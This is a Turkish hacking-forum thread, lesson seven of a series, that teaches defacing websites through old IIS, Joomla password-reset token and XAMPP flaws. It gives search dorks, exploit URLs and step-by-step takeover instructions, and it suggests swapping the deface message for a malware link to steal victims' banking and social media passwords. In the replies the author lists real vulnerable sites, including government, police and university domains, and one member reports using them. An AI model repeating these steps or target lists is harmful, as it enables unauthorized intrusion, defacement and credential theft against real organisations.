1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

1. Düzey Hack Dersleri #7-iss-xampp-token Açıkları

'Web Hacking ve Güvenlik' forumunda ERVAH-I-EZEL tarafından 26 Mayıs 2017 tarihinde açılan konu

  1. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Selâmün Aleyküm devrelerim, hack derslerinde 7. bölümdeyiz. Önceki dersimizde SQL Açığı ile ilgili yeni bilgiler öğrenip konuyu bitirmiştik.

    1. Düzey Hack Dersleri #1-Başlangıç
    1. Düzey Hack Dersleri #2-Temel Hack Terimleri
    1. Düzey Hack Dersleri #3-Brute Force ve İlgili Hack Terimleri
    1. Düzey Hack Dersleri #4-Rte ve Upload Açıklarını Kullanarak Site Hackleme
    1. Düzey Hack Dersleri #5-SQL Açığı Kullanımı
    1. Düzey Hack Dersleri #6 SQL Dork-SQL Bypass-Havij Kullanımı

    Bu dersimizde ise 3 yeni güvenlik açığını (Iss-Xampp-Token) öğreneceğiz. Hemen devam edelim...

    Iss Açığı

    Öncelikle benden söylemesi bu açık ile site hacklemek forumumuzda yasaklanmıştır.
    Zaten eski bir açık türüdür, şansınıza denk gelirse bu açık ile site hackleyebilirsiniz.

    1. Adım:

    Eğer Windows Xp kullanıcısı iseniz ki büyük çoğunlukla değilsiniz, bu kodu "Çalıştır" aracına yazın.

    Kod:
    %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

    Windows 7,8,10 kullanıcıları ise "Bilgisayar" yolu üzerinde boş bir alana sağ tıklayıp "Ağ Konumu Ekle" seçeneğine giderek devam edebilirler.

    2. Adım:

    Benim işletim sistemim Windows 7 olduğu için ona göre devam ediyorum ama Windows Xp kullanıcısı da varsa yapacağımız işlemin mantığını zaten anlayacaktır.

    Sırasıyla; İleri-> Özel Bir Ağ Konumu Seçin şeklinde ilerliyoruz.

    Karşınıza çıkan kutucuğa Iss açıklı sitenin adresini yazın ve "İleri" olarak devam edin. İşlem başarısız olursa sitede Iss açığı yoktur. (Iss açıklı siteleri bulmak için dork ya da başka bir seçenek yoktur. Deneme yanılma yoluyla bulursunuz.)

    Karşınıza çıkan yere İndex Dosyanızı ".html" uzantısı ile ekleyin. Siteyi bir bakımdan hacklediniz. Hacklediğiniz sayfaya şu şekilde ulaşabilirsiniz:

    Kod:
    www.siteninadı.com/indexdosyasınınadı.html

    Token Açığı

    Bu açık da eski bir güvenlik açık türüdür bu yüzden site araması yapılırken genelde gelişmemiş ülkeler (Mesela Bangladeş) üzerinden yapılır. İlk önce arama motoruna yazmamız gereken bir dork var.

    Dork:

    Kod:
    /index.php?&option=com 

    Buna ek olarak bir ülkenin Web uzantısını da ekleyebiliriz. Bangladeş uzantısı "bd" şeklindedir.

    Kod:
    /index.php?&option=com site:bd

    Daha sonra çıkan sitelerdeki "url" bölümünü resimdeki şekilde silip;

    [​IMG]

    Yerine exploitimizi yapıştırıyoruz.

    Exploit:
    Kod:
    /index.php?&option=com_user&view=reset&layout=confirm
    Eğer sitemizde Token Açığı varsa resimdeki gibi bir "Token:" bölümü çıkacaktır. Eğer hata alırsanız veya karşınıza resimdeki gibi bir bölüm çıkmazsa sitede Token Açığı yoktur, başka bir site denemelisiniz. Bizim sitemizde Token Açığı var ve şu şekilde:

    [​IMG]

    Karşımıza çıkan bölüme tek tırnak ya da diğer adıyla kesme işareti ( ' ) koyuyoruz. Sonra da "Submit" butonuna basıyoruz. (Butona bastıktan sonra karşınıza bir sonuç çıkmayabilir. Benim gösterdiğim sitede de çıkmadı. Dediğim gibi eski bir açık.)
    Eğer site olumlu sonuç "submit" butonuna tıkladıktan sonra karşınıza şifre değiştirmek için bir alan sunacaktır. Genelde alt alta "Şifre:" ve "Şifre Tekrarı:" gibi iki seçenek çıkar. Şifrenizi değiştirdikten sonra butona tıklayarak devam edin. Genelde sizi otomatik olarak
    Joomla Siteleri'nin admin paneline yönlendirir. Eğer yönlendirmezse sorun yok, "Joomla" bir hazır sistem olduğu için admin paneller sabittir. Onu da internetten bakarsınız artık. ;)

    Admin paneline girdiğimizi düşünelim. Şifreyi biliyoruz ama kullanıcı adı hakkında bir bilgimiz yok. Kullanıcı adları Joomla Sitelerde çoğunlukla "Admin" , "admin" , "Administrator" , "administrator" , "Webmaster" , "webmaster" gibi şeyler olur. Tek tek deneyip sonucu bulursanız admin
    panel elinizin altındadır.

    Xampp Açığı

    Çok basit bir açık türüdür. Bu güvenlik açığını kullanmak için bir dorkumuz var.

    Dork:

    Kod:
    inurl://xampp/lang.tmp

    Bu dorku arattığımıza karşımıza çıkan sitelerden birine giriyoruz. Ben örnek olarak şu siteye girdim.

    http://www.sgt.com.uy/xampp/lang.tmp

    Bu sitenin sonundaki ".tmp" uzantısını ".php?" olarak değiştirip yanına da hack mesajımı yazıp "Enter" ile ilerliyorum. Yani şu şekilde:

    http://www.sgt.com.uy/xampp/lang.php?HackedByAyyildizTim_ERVAH-I-EZEL

    Hackleme işlemi başarılı, az önceki şekilde yani ".tmp" uzantısı ile tekrar siteye giriyorum.

    http://www.sgt.com.uy/xampp/lang.tmp


    [​IMG]

    Not: Hack mesajınızı yazarken boşluk veya Türkçe Karakter kullanmamalısınız yoksa anlamsız işaretlerle karşılaşabilirsiniz.

    Genel Not: Bu derste öğrendiğimiz 3 açık türü de eski ve az bulunanlardandır. Aklınıza "Neden böyle küçük açıklarla uğraşıyorum, büyük işler yapmıyorum?" benzeri sorular gelebilir. Buna karşılık şu 2 söz çok hoşuma geliyor:

    "Ummadık taş baş yararmış!"
    "Taşın küçüğü başın büyüğünü yararmış!"

    Bunları öğrenip öğrenip ilerlersiniz, birden pat diye kafanıza oturmaz. Ayrıca basit gibi görünen şeylerle büyük işler başarabilirsiniz. İsteyene ben Token Açığı bulunan Devlet Siteleri verebilirim. Ama önemli olan bunu kendiniz öğrenmenizdir. Üstelik burada hayal gücü de çok önemlidir. Xampp Açığı her ne kadar basit görünse de iyi şeyler yapabilirsiniz. Mesela bizim yaptığımız gibi "Hacked By ..." mesajı yazmak yerine bir virüs linki yazıp kullanıcı veya admine o virüsü yutturursanız kişinin sadece sitesini değil, sosyal medya hesaplarından banka şifrelerine kadar birçok veriyi ele geçirebilirsiniz. (Aklınıza hiç geldi mi?) Şimdi bana gelip de "Nasıl yapabilirim?" de demeyin. Ben size daha ilk dersimizde sadece buraya bağlı kalmamanızı, araştırma yapıp bilginizi artırmanızı söyledim değil mi? Bu işler zamanla olur. Beni çok iyi anladığınızdan eminim. ;)

    Bu dersimizin de sonuna geldik devrelerim. Bana destek olmak için beğenileriniz ve değerli yorumlarınız yeterlidir. Anlamadığınız veya sormak istediklerinize her zaman açığım. İyi forumlar... ;)
     
  2. Xsahsiyet Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    8
    Alınan Beğeniler:
    6

    Özel Mesaj
    Yine güzel bir çalışma olmuş devren ellerine sağlık
     
    ERVAH-I-EZEL bunu beğendi.
  3. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Sağol devrem. :)
     
    KaLiNuX ve Xsahsiyet bunu beğendi.
  4. Xsahsiyet Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    8
    Alınan Beğeniler:
    6

    Özel Mesaj
    Yeni derslerinide sabırsızlıkla bekliyoruz
     
    ERVAH-I-EZEL bunu beğendi.
  5. oyuncu_king Atıldı

    • Guest
    Katılım:
    13 Ocak 2017
    Mesaj:
    133
    Alınan Beğeniler:
    134

    Özel Mesaj
    Eline sağlık devrem. Yine güzel bir konu olmuş. :)
     
    ERVAH-I-EZEL ve Xsahsiyet bunu beğendi.
  6. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Sağol devrem. :)
     
  7. xDelugee Guest

    • Guest
    Katılım:
    26 Mayıs 2017
    Mesaj:
    31
    Alınan Beğeniler:
    7

    Özel Mesaj
    Ellerine Sağlık Devrem
     
    ERVAH-I-EZEL bunu beğendi.
  8. Xsahsiyet Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    8
    Alınan Beğeniler:
    6

    Özel Mesaj
    Sql konusunda alıştırma yaparken +order+by+100 yazdım hata vermedi
    100 tane sayımı yazıcam yoksa bu sitede sql açığı yokmu
     
  9. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Sağol devrem. :)
    Bu SQL Açığı olmadığını kesin olarak kanıtlamaz. Havij Programı ile dener misin? Bazı sitelerde hata alınır ama ekranda gözükmez.
     
    Xsahsiyet bunu beğendi.
  10. oyuncu_king Atıldı

    • Guest
    Katılım:
    13 Ocak 2017
    Mesaj:
    133
    Alınan Beğeniler:
    134

    Özel Mesaj
    Devrem Token Açıklı birkaç site verebilir misin? Ben bir türlü bulamıyorum. :mad:
     
  11. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Bulması zor, bu konuda ben biraz hazıra konuyorum ya neyse. :D Başka bir yerden buldum bunları, iyi kullanımlar.

    http://www.sernapesca.cl/index.php?option=com_user&view=reset&layout=confirm
    http://urdu.pta.gov.pk/index.php?option=com_user&view=reset&layout=confirm (Pakistan Telekomisyon Merkezi Sitesi)
    http://www.astynomia.gr/index.php?option=com_user&view=reset&layout=confirm (Yunanistan Polis Merkezi Sitesi)
    www.dgso.org/web/index.php?option=com_user&view=reset&layout=confirm ( Douglas County Sheriffler Merkezi Sitesi)
    http://www.dphe.gov.bd/index.php?option=com_user&view=reset&layout=confirm
    http://www.smk.sum.edu.pl/index.php?option=com_user&view=reset&layout=confirm

    Tek tek kontrol etmedim, çok işim var şuan ama doğru olmaları lazım. Kolay gelsin. ;)
     
    oyuncu_king bunu beğendi.
  12. oyuncu_king Atıldı

    • Guest
    Katılım:
    13 Ocak 2017
    Mesaj:
    133
    Alınan Beğeniler:
    134

    Özel Mesaj
    Sağol devrem :), inceleyeceğim...
     
    ERVAH-I-EZEL bunu beğendi.
  13. Xsahsiyet Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    8
    Alınan Beğeniler:
    6

    Özel Mesaj
    Devrem yeni ders ne zaman gelecek
     
    ERVAH-I-EZEL bunu beğendi.
  14. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Uzun bir konu hazırlıyorum devrem. Malum sahura kadar uyumuyoruz. :) Emin değilim ama bu geceye kadar gelir diye düşünüyorum devrem.
     
  15. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
  16. smder Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    23
    Alınan Beğeniler:
    13
    Meslek:
    Ögrenci

    Özel Mesaj
    ´
    Devrem Ellerine Saglik Yine Faydali Bir Konu Olmus
    Rica Etsem Bana Token Açığı bulunan Devlet Sitelerinin Linkini Gönderirmisin Müsaitsen ?
     
    ERVAH-I-EZEL bunu beğendi.
  17. smder Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    23
    Alınan Beğeniler:
    13
    Meslek:
    Ögrenci

    Özel Mesaj
    Token Acigi Olanlari Yukarida Vermissin Yeni Gördüm Kusura Bakma Xampp Açığı olanlarida bulamiyom onlardan gönderirsen cok iyi olur :)
     
    ERVAH-I-EZEL bunu beğendi.
  18. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,873

    Özel Mesaj
    Önemli değil devrem. :)

    Xampp Açıklı siteleri neden bulamıyorsun ki? Dorku arattığında karşına 3-4 sayfa çıkar zaten. Onların da hemen hemen hepsi Xampp Açıklıdır. Yine de birkaç tane vereyim buyur:

    http://repository.lasallista.edu.co:8080/xampp/lang.tmp
    https://mail.ch-ina.com/xampp/lang.tmp
    https://www.art-st-urban.ch/xampp/lang.tmp
    http://www.zitronen-in-rot.de/xampp/lang.tmp
     
  19. smder Guest

    • Guest
    Katılım:
    25 Mayıs 2017
    Mesaj:
    23
    Alınan Beğeniler:
    13
    Meslek:
    Ögrenci

    Özel Mesaj
    Verdigin Linkler Sayesinde Uygulamamida Yaptim Saolasin Devrem :)
     
    ERVAH-I-EZEL bunu beğendi.
  20. TheMaraz Atıldı

    • Guest
    Katılım:
    8 Mart 2017
    Mesaj:
    372
    Alınan Beğeniler:
    463

    Özel Mesaj

Bu Sayfayı Paylaş